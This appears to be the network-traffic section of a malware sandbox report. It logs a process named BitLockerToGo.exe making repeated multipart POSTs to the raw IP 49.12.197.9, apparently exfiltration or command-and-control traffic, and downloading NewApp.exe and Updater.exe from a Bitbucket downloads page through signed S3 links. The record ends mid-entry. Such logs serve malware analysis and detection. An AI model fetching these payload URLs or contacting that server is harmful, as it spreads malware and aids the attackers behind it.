          Date: Sat, 05 Oct 2024 08:22:52 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: keep-alive
        • flag-de
          POST
          https://49.12.197.9/
          BitLockerToGo.exe
          Remote address:
          49.12.197.9:443
          Request
          POST / HTTP/1.1
          Content-Type: multipart/form-data; boundary=----ECBGCGCGIEGCBFHIIEBF
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
          Host: 49.12.197.9
          Content-Length: 331
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx
          Date: Sat, 05 Oct 2024 08:22:52 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: keep-alive
        • flag-de
          POST
          https://49.12.197.9/
          BitLockerToGo.exe
          Remote address:
          49.12.197.9:443
          Request
          POST / HTTP/1.1
          Content-Type: multipart/form-data; boundary=----BFCAAEHJDBKJJKFHJEBK
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
          Host: 49.12.197.9
          Content-Length: 461
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx
          Date: Sat, 05 Oct 2024 08:22:53 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: keep-alive
        • flag-de
          POST
          https://49.12.197.9/
          BitLockerToGo.exe
          Remote address:
          49.12.197.9:443
          Request
          POST / HTTP/1.1
          Content-Type: multipart/form-data; boundary=----ECFHJKEBAAECBFHIECGI
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
          Host: 49.12.197.9
          Content-Length: 331
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx
          Date: Sat, 05 Oct 2024 08:22:53 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: keep-alive
        • flag-us
          DNS
          bitbucket.org
          BitLockerToGo.exe
          Remote address:
          8.8.8.8:53
          Request
          bitbucket.org
          IN A
          Response
          bitbucket.org
          IN A
          185.166.142.23
          bitbucket.org
          IN A
          185.166.142.21
          bitbucket.org
          IN A
          185.166.142.22
        • flag-ie
          GET
          https://bitbucket.org/hgtbvfd11/123aqd/downloads/NewApp.exe
          BitLockerToGo.exe
          Remote address:
          185.166.142.23:443
          Request
          GET /hgtbvfd11/123aqd/downloads/NewApp.exe HTTP/1.1
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
          Host: bitbucket.org
          Cache-Control: no-cache
          Response
          HTTP/1.1 302 Found
          Date: Sat, 05 Oct 2024 08:22:54 GMT
          Content-Type: text/html; charset=utf-8
          Content-Length: 0
          Server: AtlassianEdge
          Location: https://bbuseruploads.s3.amazonaws.com/3b6fbe38-2b9c-4423-ba17-dbc5db6e9e2c/downloads/efc3f4df-566a-4e3d-a8c3-cd4708b4599f/NewApp.exe?response-content-disposition=attachment%3B%20filename%3D%22NewApp.exe%22&AWSAccessKeyId=ASIA6KOSE3BNIOEDZEQY&Signature=Kjq5tG1cimjEQTj0wkOA2GOCLPQ%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEKH%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJHMEUCIQCnXgyFltKi3dQpydsVQvAwlMztTPllbRgX4mMAeuidXwIgF3B23dFoYwbLjjC39KAJpIfH2Bj5a14COsVsnfjcQp4qsAII6v%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDEc4xoYs92b5j8nidiqEAswimLEg3%2BZ4O6g8egwzuANPjyidZc7ieOaDWbpGfQCnRP2ws3gvQqxQcqLA084F9TTH3KDgAes9iq9PRXVlp8BAwEwtylETuGENBhLvf9n6%2FRuEaOoRdNNV%2BO4Uh%2BnuRekm4CHIUFL4Mk%2BGTihNv73LT%2F%2BlxkwVgvQQRZDs2XRpxF9axVntPBLFwwfUeJWhYIcTqDIIt2NKvzY%2BmqvdFoJ6Oj%2F6Xz75gc4RDy2G3ZJ3ZeLzobFvLNge9aaSTJfXCYDXDinSkz0W6mgrMgmpr0Gq7K7SXwkNjY7Q1fHkN4TC96FhCtUyLbUAeAz365NyoXrPT9ul2qPupYhI0PZG%2Fix7pCkaMN7ug7gGOp0B8zlzvjZ%2F7zIduo96c0nV%2FQRieWQsdSehGHLrbpI1Lq0wQ7Nu087qZQjtEomi%2Fy3TO3z9CmMUq4c77tK5QTrFqOVd%2F%2BVqmyADdz%2B0qhS0FwaWXJspJLBV3EkUjgAgc5vyIEFLZsH2KAd3j5Q29LuuIftaTgaeCC9qHuzGhQDjtEcajazoBgzYZdwuS7engKURLtjhK3e%2BLHLo3YWIpQ%3D%3D&Expires=1728118374
          Expires: Sat, 05 Oct 2024 08:22:54 GMT
          Cache-Control: max-age=0, no-cache, no-store, must-revalidate, private
          X-Used-Mesh: False
          Vary: Accept-Language, Origin
          Content-Language: en
          X-View-Name: bitbucket.apps.downloads.views.download_file
          X-Dc-Location: Micros-3
          X-Served-By: db45e76b7fb5
          X-Version: 8e66bccd2be3
          X-Static-Version: 8e66bccd2be3
          X-Request-Count: 2075
          X-Render-Time: 0.4971165657043457
          X-B3-Traceid: 7d378ac2edac400bb8edaf5f749617e9
          X-B3-Spanid: aac2380f9dde3aa9
          X-Frame-Options: SAMEORIGIN
          Content-Security-Policy: frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; base-uri 'self'; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com xp.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io *.ingest.sentry.io events.launchdarkly.com app.launchdarkly.com statsigapi.net fd-config.us-east-1.prod.public.atl-paas.net fd-config-bifrost.prod-east.frontend.public.atl-paas.net micros--prod-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--prod-east--bitbucketci-file-service--files.s3.amazonaws.com micros--stg-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--stg-east--bitbucketci-file-service--files.s3.amazonaws.com micros--ddev-west--bitbucketci-file-service--files.s3.ap-southeast-2.amazonaws.com bqlf8qjztdtr.statuspage.io https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; object-src 'none'; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; report-uri https://web-security-reports.services.atlassian.com/csp-report/bb-website
          X-Usage-Quota-Remaining: 988171.043
          X-Usage-Request-Cost: 11967.73
          X-Usage-User-Time: 0.288637
          X-Usage-System-Time: 0.070395
          X-Usage-Input-Ops: 0
          X-Usage-Output-Ops: 0
          Age: 0
          X-Cache: MISS
          X-Content-Type-Options: nosniff
          X-Xss-Protection: 1; mode=block
          Atl-Traceid: 7d378ac2edac400bb8edaf5f749617e9
          Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600}
          Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
          Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
          Server-Timing: atl-edge;dur=581,atl-edge-internal;dur=3,atl-edge-upstream;dur=580,atl-edge-pop;desc="aws-eu-west-1"
        • flag-ie
          GET
          https://bitbucket.org/hgtbvfd11/123aqd/downloads/Updater.exe
          BitLockerToGo.exe
          Remote address:
          185.166.142.23:443
          Request
          GET /hgtbvfd11/123aqd/downloads/Updater.exe HTTP/1.1
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
          Host: bitbucket.org
          Cache-Control: no-cache
          Response
          HTTP/1.1 302 Found
          Date: Sat, 05 Oct 2024 08:23:03 GMT
          Content-Type: text/html; charset=utf-8
          Content-Length: 0
          Server: AtlassianEdge
          Location: https://bbuseruploads.s3.amazonaws.com/3b6fbe38-2b9c-4423-ba17-dbc5db6e9e2c/downloads/229e1024-5f7f-478d-87e8-7147253740ca/Updater.exe?response-content-disposition=attachment%3B%20filename%3D%22Updater.exe%22&AWSAccessKeyId=ASIA6KOSE3BNGZQJJ3LT&Signature=nZUikPkEYNyH%2BN7Of20X24D4RWc%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEKH%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJHMEUCICPY6T%2FxbdvaUM6%2FHMyAfa1No%2B3nhNgdiAdegOTeig5iAiEA0rt%2FOYiAqqaV13gbcKAu9tR4jG6JeTBUCFR%2B%2Blc8nDcqsAII6v%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDBEQmbyN6goaJEb7piqEAikvE2kgTu1BlGdTB2Jd%2F1pwDiGFYBo9RjFI1VdiepzQwgzg65z6YcU2PPsmTeUsh9uJyNt1%2BbpL6BfBgRKmAqz6gZV7xG85H%2FTWe1jCwjYsqTcwdLk3UKxTShPQKl%2B4Srg7gs2VrWM%2Bhgf49SYSiNpdzpUJgA5j2ApwYTDCnfPZw1k6jOXdbWrmWBpKKIhoPr8r37XdUeA59X1x01S2oFq2seIzf0wo1SrgQYsA3f9ZPzgne0ILrzeUB6r0dsgXVTE57uAXEOTt5rnt%2F2SESTFGbWdJC3b0CNecPfqsbEDtYMB6q0%2B0WkeaLKXP%2BNwY0TF4USWY2jcvRFZ99AHmpJTtSXCmMOfug7gGOp0B1SA0VjWXp94AbNAVTqjYnmGsaxXDd8KFVTqLt6D3vy2EUeMN7gZdO%2Bd1HsxFiaZ%2B0hm3Xav9zVYNQ15%2Fny2qB5qlJ%2BFNNk1huLZkCmI3faq9SUMCpOELBt38Nh4tgizwqDzDJEFBCBtsTa8%2F%2BeZVK8QBZU0M4basZJkF%2FI%2BaKFdQltAASWCbW52A7eXufbJ8LBmXdKUOWs38nCpu6Q%3D%3D&Expires=1728118383
          Expires: Sat, 05 Oct 2024 08:23:03 GMT
          Cache-Control: max-age=0, no-cache, no-store, must-revalidate, private
          X-Used-Mesh: False
          Vary: Accept-Language, Origin
          Content-Language: en
          X-View-Name: bitbucket.apps.downloads.views.download_file
          X-Dc-Location: Micros-3
          X-Served-By: 2b8e2936830e
          X-Version: 8e66bccd2be3
          X-Static-Version: 8e66bccd2be3
          X-Request-Count: 3966
          X-Render-Time: 1.3546416759490967
          X-B3-Traceid: 1accf5bf39c544efba03694af767c8ce
          X-B3-Spanid: 48afa128dd543fd9
          X-Frame-Options: SAMEORIGIN
          Content-Security-Policy: style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; object-src 'none'; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com xp.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io *.ingest.sentry.io events.launchdarkly.com app.launchdarkly.com statsigapi.net fd-config.us-east-1.prod.public.atl-paas.net fd-config-bifrost.prod-east.frontend.public.atl-paas.net micros--prod-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--prod-east--bitbucketci-file-service--files.s3.amazonaws.com micros--stg-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--stg-east--bitbucketci-file-service--files.s3.amazonaws.com micros--ddev-west--bitbucketci-file-service--files.s3.ap-southeast-2.amazonaws.com bqlf8qjztdtr.statuspage.io https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; base-uri 'self'; frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org; report-uri https://web-security-reports.services.atlassian.com/csp-report/bb-website
          X-Usage-Quota-Remaining: 950920.181
          X-Usage-Request-Cost: 39699.20
          X-Usage-User-Time: 1.087623
          X-Usage-System-Time: 0.103353
          X-Usage-Input-Ops: 0
          X-Usage-Output-Ops: 0
          Age: 0
          X-Cache: MISS
          X-Content-Type-Options: nosniff
          X-Xss-Protection: 1; mode=block
          Atl-Traceid: 1accf5bf39c544efba03694af767c8ce
          Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600}
          Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
          Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
          Server-Timing: atl-edge;dur=1439,atl-edge-internal;dur=3,atl-edge-upstream;dur=1438,atl-edge-pop;desc="aws-eu-west-1"
        • flag-us
          DNS
          23.142.166.185.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          23.142.166.185.in-addr.arpa
          IN PTR
          Response
        • flag-us
          DNS
          bbuseruploads.s3.amazonaws.com
          BitLockerToGo.exe
          Remote address:
          8.8.8.8:53
          Request
          bbuseruploads.s3.amazonaws.com
          IN A
          Response
          bbuseruploads.s3.amazonaws.com
          IN CNAME
          s3-1-w.amazonaws.com
          s3-1-w.amazonaws.com
          IN CNAME
          s3-w.us-east-1.amazonaws.com
          s3-w.us-east-1.amazonaws.com
          IN A
          3.5.16.13
          s3-w.us-east-1.amazonaws.com
          IN A
          16.182.71.105
          s3-w.us-east-1.amazonaws.com
          IN A
          54.231.228.41
          s3-w.us-east-1.amazonaws.com
          IN A
          52.216.37.97
          s3-w.us-east-1.amazonaws.com
          IN A
          16.182.38.177
          s3-w.us-east-1.amazonaws.com
          IN A
          3.5.28.154
          s3-w.us-east-1.amazonaws.com
          IN A
          54.231.197.129
          s3-w.us-east-1.amazonaws.com
          IN A
          52.216.51.145
        • flag-us
          GET
          https://bbuseruploads.s3.amazonaws.com/3b6fbe38-2b9c-4423-ba17-dbc5db6e9e2c/downloads/efc3f4df-566a-4e3d-a8c3-cd4708b4599f/NewApp.exe?response-content-disposition=attachment%3B%20filename%3D%22NewApp.exe%22&AWSAccessKeyId=ASIA6KOSE3BNIOEDZEQY&Signature=Kjq5tG1cimjEQTj0wkOA2GOCLPQ%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEKH%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJHMEUCIQCnXgyFltKi3dQpydsVQvAwlMztTPllbRgX4mMAeuidXwIgF3B23dFoYwbLjjC39KAJpIfH2Bj5a14COsVsnfjcQp4qsAII6v%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDEc4xoYs92b5j8nidiqEAswimLEg3%2BZ4O6g8egwzuANPjyidZc7ieOaDWbpGfQCnRP2ws3gvQqxQcqLA084F9TTH3KDgAes9iq9PRXVlp8BAwEwtylETuGENBhLvf9n6%2FRuEaOoRdNNV%2BO4Uh%2BnuRekm4CHIUFL4Mk%2BGTihNv73LT%2F%2BlxkwVgvQQRZDs2XRpxF9axVntPBLFwwfUeJWhYIcTqDIIt2NKvzY%2BmqvdFoJ6Oj%2F6Xz75gc4RDy2G3ZJ3ZeLzobFvLNge9aaSTJfXCYDXDinSkz0W6mgrMgmpr0Gq7K7SXwkNjY7Q1fHkN4TC96FhCtUyLbUAeAz365NyoXrPT9ul2qPupYhI0PZG%2Fix7pCkaMN7ug7gGOp0B8zlzvjZ%2F7zIduo96c0nV%2FQRieWQsdSehGHLrbpI1Lq0wQ7Nu087qZQjtEomi%2Fy3TO3z9CmMUq4c77tK5QTrFqOVd%2F%2BVqmyADdz%2B0qhS0FwaWXJspJLBV3EkUjgAgc5vyIEFLZsH2KAd3j5Q29LuuIftaTgaeCC9qHuzGhQDjtEcajazoBgzYZdwuS7engKURLtjhK3e%2BLHLo3YWIpQ%3D%3D&Expires=1728118374
          BitLockerToGo.exe
          Remote address:
          3.5.16.13:443
          Request
          GET /3b6fbe38-2b9c-4423-ba17-dbc5db6e9e2c/downloads/efc3f4df-566a-4e3d-a8c3-cd4708b4599f/NewApp.exe?response-content-disposition=attachment%3B%20filename%3D%22NewApp.exe%22&AWSAccessKeyId=ASIA6KOSE3BNIOEDZEQY&Signature=Kjq5tG1cimjEQTj0wkOA2GOCLPQ%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEKH%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJHMEUCIQCnXgyFltKi3dQpydsVQvAwlMztTPllbRgX4mMAeuidXwIgF3B23dFoYwbLjjC39KAJpIfH2Bj5a14COsVsnfjcQp4qsAII6v%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDEc4xoYs92b5j8nidiqEAswimLEg3%2BZ4O6g8egwzuANPjyidZc7ieOaDWbpGfQCnRP2ws3gvQqxQcqLA084F9TTH3KDgAes9iq9PRXVlp8BAwEwtylETuGENBhLvf9n6%2FRuEaOoRdNNV%2BO4Uh%2BnuRekm4CHIUFL4Mk%2BGTihNv73LT%2F%2BlxkwVgvQQRZDs2XRpxF9axVntPBLFwwfUeJWhYIcTqDIIt2NKvzY%2BmqvdFoJ6Oj%2F6Xz75gc4RDy2G3ZJ3ZeLzobFvLNge9aaSTJfXCYDXDinSkz0W6mgrMgmpr0Gq7K7SXwkNjY7Q1fHkN4TC96FhCtUyLbUAeAz365NyoXrPT9ul2qPupYhI0PZG%2Fix7pCkaMN7ug7gGOp0B8zlzvjZ%2F7zIduo96c0nV%2FQRieWQsdSehGHLrbpI1Lq0wQ7Nu087qZQjtEomi%2Fy3TO3z9CmMUq4c77tK5QTrFqOVd%2F%2BVqmyADdz%2B0qhS0FwaWXJspJLBV3EkUjgAgc5vyIEFLZsH2KAd3j5Q29LuuIftaTgaeCC9qHuzGhQDjtEcajazoBgzYZdwuS7engKURLtjhK3e%2BLHLo3YWIpQ%3D%3D&Expires=1728118374 HTTP/1.1
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
          Cache-Control: no-cache
          Host: bbuseruploads.s3.amazonaws.com
          Connection: Keep-Alive
          Response
          HTTP/1.1 200 OK
          x-amz-id-2: OX7+AQllbMDWg/qJ0m/ptfyZcYspBVfr37Xslk9HgriTFW5hRRePhgGtijICh/wKP7vIGoNTJZiiD2cGgUMWwQUOoTdtAcQY
          x-amz-request-id: X6YMGC3GW2H9JD2E
          Date: Sat, 05 Oct 2024 08:22:56 GMT
          Last-Modified: Thu, 03 Oct 2024 08:02:06 GMT
          ETag: "2eea3ddbfc81544b54a4ac5028a30805"
          x-amz-server-side-encryption: AES256
          x-amz-version-id: Fk1G95uwCTSIHuiL1YR58Oq1fwlhJgaG
          Content-Disposition: attachment; filename="NewApp.exe"
          Accept-Ranges: bytes
          Content-Type: application/x-msdownload
          Server: AmazonS3
          Content-Length: 5853680
        • flag-us
          GET
          https://bbuseruploads.s3.amazonaws.com/3b6fbe38-2b9c-4423-ba17-dbc5db6e9e2c/downloads/229e1024-5f7f-478d-87e8-7147253740ca/Updater.exe?response-content-disposition=attachment%3B%20filename%3D%22Updater.exe%22&AWSAccessKeyId=ASIA6KOSE3BNGZQJJ3LT&Signature=nZUikPkEYNyH%2BN7Of20X24D4RWc%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEKH%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJHMEUCICPY6T%2FxbdvaUM6%2FHMyAfa1No%2B3nhNgdiAdegOTeig5iAiEA0rt%2FOYiAqqaV13gbcKAu9tR4jG6JeTBUCFR%2B%2Blc8nDcqsAII6v%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDBEQmbyN6goaJEb7piqEAikvE2kgTu1BlGdTB2Jd%2F1pwDiGFYBo9RjFI1VdiepzQwgzg65z6YcU2PPsmTeUsh9uJyNt1%2BbpL6BfBgRKmAqz6gZV7xG85H%2FTWe1jCwjYsqTcwdLk3UKxTShPQKl%2B4Srg7gs2VrWM%2Bhgf49SYSiNpdzpUJgA5j2ApwYTDCnfPZw1k6jOXdbWrmWBpKKIhoPr8r37XdUeA59X1x01S2oFq2seIzf0wo1SrgQYsA3f9ZPzgne0ILrzeUB6r0dsgXVTE57uAXEOTt5rnt%2F2SESTFGbWdJC3b0CNecPfqsbEDtYMB6q0%2B0WkeaLKXP%2BNwY0TF4USWY2jcvRFZ99AHmpJTtSXCmMOfug7gGOp0B1SA0VjWXp94AbNAVTqjYnmGsaxXDd8KFVTqLt6D3vy2EUeMN7gZdO%2Bd1HsxFiaZ%2B0hm3Xav9zVYNQ15%2Fny2qB5qlJ%2BFNNk1huLZkCmI3faq9SUMCpOELBt38Nh4tgizwqDzDJEFBCBtsTa8%2F%2BeZVK8QBZU0M4basZJkF%2FI%2BaKFdQltAASWCbW52A7eXufbJ8LBmXdKUOWs38nCpu6Q%3D%3D&Expires=1728118383
          BitLockerToGo.exe
          Remote address:
          3.5.16.13:443
          Request
          GET /3b6fbe38-2b9c-4423-ba17-dbc5db6e9e2c/downloads/229e1024-5f7f-478d-87e8-7147253740ca/Updater.exe?response-content-disposition=attachment%3B%20filename%3D%22Updater.exe%22&AWSAccessKeyId=ASIA6KOSE3BNGZQJJ3LT&Signature=nZUikPkEYNyH%2BN7Of20X24D4RWc%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEKH%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJHMEUCICPY6T%2FxbdvaUM6%2FHMyAfa1No%2B3nhNgdiAdegOTeig5iAiEA0rt%2FOYiAqqaV13gbcKAu9tR4jG6JeTBUCFR%2B%2Blc8nDcqsAII6v%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDBEQmbyN6goaJEb7piqEAikvE2kgTu1BlGdTB2Jd%2F1pwDiGFYBo9RjFI1VdiepzQwgzg65z6YcU2PPsmTeUsh9uJyNt1%2BbpL6BfBgRKmAqz6gZV7xG85H%2FTWe1jCwjYsqTcwdLk3UKxTShPQKl%2B4Srg7gs2VrWM%2Bhgf49SYSiNpdzpUJgA5j2ApwYTDCnfPZw1k6jOXdbWrmWBpKKIhoPr8r37XdUeA59X1x01S2oFq2seIzf0wo1SrgQYsA3f9ZPzgne0ILrzeUB6r0dsgXVTE57uAXEOTt5rnt%2F2SESTFGbWdJC3b0CNecPfqsbEDtYMB6q0%2B0WkeaLKXP%2BNwY0TF4USWY2jcvRFZ99AHmpJTtSXCmMOfug7gGOp0B1SA0VjWXp94AbNAVTqjYnmGsaxXDd8KFVTqLt6D3vy2EUeMN7gZdO%2Bd1HsxFiaZ%2B0hm3Xav9zVYNQ15%2Fny2qB5qlJ%2BFNNk1huLZkCmI3faq9SUMCpOELBt38Nh4tgizwqDzDJEFBCBtsTa8%2F%2BeZVK8QBZU0M4basZJkF%2FI%2BaKFdQltAASWCbW52A7eXufbJ8LBmXdKUOWs38nCpu6Q%3D%3D&Expires=1728118383 HTTP/1.1
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
          Cache-Control: no-cache
          Host: bbuseruploads.s3.amazonaws.com
          Connection: Keep-Alive
          Response
          HTTP/1.1 200 OK
          x-amz-id-2: aXi/9TfXejvaRhPyLg+ydwURyr3j3B7ZhXAMGnmjrh65hbpF9LBtqUuUzJzPaskdISrFc3VBDo137njbR1YDVH0ImjmPj97V
          x-amz-request-id: YDXD9SKQJ8PBGEAE
          Date: Sat, 05 Oct 2024 08:23:04 GMT
          Last-Modified: Thu, 03 Oct 2024 08:02:06 GMT
          ETag: "925ec45b5ac88ab7af039190589204b9"
          x-amz-server-side-encryption: AES256
          x-amz-version-id: lceKswdw3_ZaYw5A4dJzcUOjLOVj1QhX
          Content-Disposition: attachment; filename="Updater.exe"
          Accept-Ranges: bytes
          Content-Type: application/x-msdownload
          Server: AmazonS3
          Content-Length: 5699232
        • flag-us
          DNS
          ocsp.r2m01.amazontrust.com
          BitLockerToGo.exe
          Remote address:
          8.8.8.8:53
          Request
          ocsp.r2m01.amazontrust.com
          IN A
          Response
          ocsp.r2m01.amazontrust.com
          IN A
          18.238.246.206
        • flag-nl
          GET
          http://ocsp.r2m01.amazontrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBShdVEFnSEQ0gG5CBtzM48cPMe9XwQUgbgOY4qJEhjl%2Bjs7UJWf5uWQE4UCEAO9ExOMvLBqk2jkjdZnyjA%3D
          BitLockerToGo.exe
          Remote address:
          18.238.246.206:80
          Request
          GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBShdVEFnSEQ0gG5CBtzM48cPMe9XwQUgbgOY4qJEhjl%2Bjs7UJWf5uWQE4UCEAO9ExOMvLBqk2jkjdZnyjA%3D HTTP/1.1
          Connection: Keep-Alive
          Accept: */*
          User-Agent: Microsoft-CryptoAPI/10.0
          Host: ocsp.r2m01.amazontrust.com
          Response
          HTTP/1.1 200 OK
          Content-Type: application/ocsp-response
          Content-Length: 471
          Connection: keep-alive
          Accept-Ranges: bytes
          Cache-Control: max-age=7200
          Date: Sat, 05 Oct 2024 06:24:08 GMT
          Last-Modified: Sat, 05 Oct 2024 06:24:08 GMT
          Server: ECAcc (frc/4CD7)
          X-Cache: Hit from cloudfront
          Via: 1.1 432282689bafd802e8ec9636c256a3b0.cloudfront.net (CloudFront)
          X-Amz-Cf-Pop: AMS58-P1
          X-Amz-Cf-Id: Kc_9wOZeo2P8CZ50r6-sWscjmVa5gz56yyasNlouYNFzAJ2NurVqfw==
          Age: 7127
        • flag-us
          DNS
          197.87.175.4.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          197.87.175.4.in-addr.arpa
          IN PTR
          Response
        • flag-us
          DNS
          15.164.165.52.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          15.164.165.52.in-addr.arpa
          IN PTR
          Response
        • flag-us
          DNS
          13.16.5.3.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          13.16.5.3.in-addr.arpa
          IN PTR
          Response
          13.16.5.3.in-addr.arpa
          IN PTR
          s3-w.us-east-1.amazonaws.com
        • flag-us
          DNS
          174.15.239.18.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          174.15.239.18.in-addr.arpa
          IN PTR
          Response
          174.15.239.18.in-addr.arpa
          IN PTR
          server-18-239-15-174.ams58.r.cloudfront.net
        • flag-us
          DNS
          80.41.65.18.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          80.41.65.18.in-addr.arpa
          IN PTR
          Response
          80.41.65.18.in-addr.arpa
          IN PTR
          server-18-65-41-80.ams1.r.cloudfront.net
        • flag-us
          DNS
          206.246.238.18.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          206.246.238.18.in-addr.arpa
          IN PTR
          Response
          206.246.238.18.in-addr.arpa
          IN PTR
          server-18-238-246-206.ams58.r.cloudfront.net
        • flag-us
          DNS
